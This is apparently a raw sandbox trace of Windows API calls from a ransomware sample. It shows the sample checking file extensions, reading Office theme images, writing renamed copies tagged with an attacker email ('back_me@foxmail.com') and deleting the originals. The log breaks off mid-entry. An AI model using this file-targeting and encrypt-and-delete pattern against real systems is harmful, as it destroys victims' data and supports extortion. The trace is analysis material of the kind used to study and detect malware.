[0047.284] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.284] lstrlenW (lpString=".pdf") returned 4 [0047.284] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.284] lstrlenW (lpString=".xls") returned 4 [0047.284] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.284] lstrlenW (lpString=".xlsx") returned 5 [0047.284] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.284] lstrlenW (lpString=".ppt") returned 4 [0047.284] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.284] lstrlenW (lpString=".zip") returned 4 [0047.284] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.284] lstrlenW (lpString=".rar") returned 4 [0047.284] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.284] lstrlenW (lpString=".bz2") returned 4 [0047.284] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.284] lstrlenW (lpString=".7z") returned 3 [0047.284] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.284] lstrlenW (lpString=".dbf") returned 4 [0047.284] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.284] lstrlenW (lpString=".1cd") returned 4 [0047.284] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.284] lstrlenW (lpString=".jpg") returned 4 [0047.284] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.285] lstrlenW (lpString=".doc") returned 4 [0047.285] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.285] lstrlenW (lpString=".docx") returned 5 [0047.285] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.285] lstrlenW (lpString=".pdf") returned 4 [0047.285] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.285] lstrlenW (lpString=".xls") returned 4 [0047.285] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.285] lstrlenW (lpString=".xlsx") returned 5 [0047.285] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.285] lstrlenW (lpString=".ppt") returned 4 [0047.285] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.285] lstrlenW (lpString=".zip") returned 4 [0047.285] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.285] lstrlenW (lpString=".rar") returned 4 [0047.285] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.285] lstrlenW (lpString=".bz2") returned 4 [0047.285] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.285] lstrlenW (lpString=".7z") returned 3 [0047.285] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.285] lstrlenW (lpString=".dbf") returned 4 [0047.285] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.285] lstrlenW (lpString=".1cd") returned 4 [0047.285] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.285] lstrlenW (lpString=".jpg") returned 4 [0047.285] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.286] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.286] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.286] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=19485) returned 1 [0047.286] CloseHandle (hObject=0x198) returned 1 [0047.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 0x20 [0047.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.286] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.286] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.287] GetLastError () returned 0x0 [0047.287] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x4c1d, lpOverlapped=0x0) returned 1 [0047.288] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0047.289] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.289] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.290] SetEndOfFile (hFile=0x194) returned 1 [0047.290] CloseHandle (hObject=0x194) returned 1 [0047.290] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.290] SetEndOfFile (hFile=0x198) returned 1 [0047.291] CloseHandle (hObject=0x198) returned 1 [0047.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.291] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1 [0047.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.291] lstrlenW (lpString=".doc") returned 4 [0047.291] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.291] lstrlenW (lpString=".docx") returned 5 [0047.291] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.291] lstrlenW (lpString=".pdf") returned 4 [0047.291] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.291] lstrlenW (lpString=".xls") returned 4 [0047.291] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.291] lstrlenW (lpString=".xlsx") returned 5 [0047.291] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.292] lstrlenW (lpString=".ppt") returned 4 [0047.292] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.292] lstrlenW (lpString=".zip") returned 4 [0047.292] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.292] lstrlenW (lpString=".rar") returned 4 [0047.292] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.292] lstrlenW (lpString=".bz2") returned 4 [0047.292] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.292] lstrlenW (lpString=".7z") returned 3 [0047.292] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.292] lstrlenW (lpString=".dbf") returned 4 [0047.292] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.292] lstrlenW (lpString=".1cd") returned 4 [0047.292] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.292] lstrlenW (lpString=".jpg") returned 4 [0047.292] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.292] lstrlenW (lpString=".doc") returned 4 [0047.292] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.292] lstrlenW (lpString=".docx") returned 5 [0047.292] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.292] lstrlenW (lpString=".pdf") returned 4 [0047.292] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.292] lstrlenW (lpString=".xls") returned 4 [0047.292] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.292] lstrlenW (lpString=".xlsx") returned 5 [0047.292] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.292] lstrlenW (lpString=".ppt") returned 4 [0047.292] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.293] lstrlenW (lpString=".zip") returned 4 [0047.293] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.293] lstrlenW (lpString=".rar") returned 4 [0047.293] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.293] lstrlenW (lpString=".bz2") returned 4 [0047.293] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.293] lstrlenW (lpString=".7z") returned 3 [0047.293] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.293] lstrlenW (lpString=".dbf") returned 4 [0047.293] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.293] lstrlenW (lpString=".1cd") returned 4 [0047.293] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0047.293] lstrlenW (lpString=".jpg") returned 4 [0047.293] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.293] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.293] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.293] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1232) returned 1 [0047.294] CloseHandle (hObject=0x198) returned 1 [0047.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 0x20 [0047.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.294] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.294] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.296] GetLastError () returned 0x0 [0047.296] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x4d0, lpOverlapped=0x0) returned 1 [0047.297] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x4e0, lpOverlapped=0x0) returned 1 [0047.298] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.298] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.298] SetEndOfFile (hFile=0x1b4) returned 1 [0047.298] CloseHandle (hObject=0x1b4) returned 1 [0047.298] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.298] SetEndOfFile (hFile=0x198) returned 1 [0047.299] CloseHandle (hObject=0x198) returned 1 [0047.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.299] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 1 [0047.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.300] lstrlenW (lpString=".doc") returned 4 [0047.300] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.300] lstrlenW (lpString=".docx") returned 5 [0047.300] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.300] lstrlenW (lpString=".pdf") returned 4 [0047.300] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.300] lstrlenW (lpString=".xls") returned 4 [0047.300] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.300] lstrlenW (lpString=".xlsx") returned 5 [0047.300] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.300] lstrlenW (lpString=".ppt") returned 4 [0047.300] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.300] lstrlenW (lpString=".zip") returned 4 [0047.300] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.300] lstrlenW (lpString=".rar") returned 4 [0047.300] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.300] lstrlenW (lpString=".bz2") returned 4 [0047.300] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.300] lstrlenW (lpString=".7z") returned 3 [0047.300] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.300] lstrlenW (lpString=".dbf") returned 4 [0047.300] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.300] lstrlenW (lpString=".1cd") returned 4 [0047.300] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.300] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.300] lstrlenW (lpString=".jpg") returned 4 [0047.300] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.301] lstrlenW (lpString=".doc") returned 4 [0047.301] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.301] lstrlenW (lpString=".docx") returned 5 [0047.301] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.301] lstrlenW (lpString=".pdf") returned 4 [0047.301] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.301] lstrlenW (lpString=".xls") returned 4 [0047.301] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.301] lstrlenW (lpString=".xlsx") returned 5 [0047.301] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.301] lstrlenW (lpString=".ppt") returned 4 [0047.301] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.301] lstrlenW (lpString=".zip") returned 4 [0047.301] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.301] lstrlenW (lpString=".rar") returned 4 [0047.301] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.301] lstrlenW (lpString=".bz2") returned 4 [0047.301] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.301] lstrlenW (lpString=".7z") returned 3 [0047.301] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.301] lstrlenW (lpString=".dbf") returned 4 [0047.301] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.302] lstrlenW (lpString=".1cd") returned 4 [0047.302] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0047.302] lstrlenW (lpString=".jpg") returned 4 [0047.302] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.302] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.302] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.302] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=18413) returned 1 [0047.302] CloseHandle (hObject=0x198) returned 1 [0047.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 0x20 [0047.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.303] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.303] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.303] GetLastError () returned 0x0 [0047.303] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x47ed, lpOverlapped=0x0) returned 1 [0047.556] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x47f0, lpOverlapped=0x0) returned 1 [0047.557] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.560] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.560] SetEndOfFile (hFile=0x1b4) returned 1 [0047.560] CloseHandle (hObject=0x1b4) returned 1 [0047.560] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.560] SetEndOfFile (hFile=0x198) returned 1 [0047.561] CloseHandle (hObject=0x198) returned 1 [0047.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.562] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1 [0047.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.562] lstrlenW (lpString=".doc") returned 4 [0047.562] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.562] lstrlenW (lpString=".docx") returned 5 [0047.562] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.562] lstrlenW (lpString=".pdf") returned 4 [0047.562] lstrcmpiW (lpString1=".pdf", 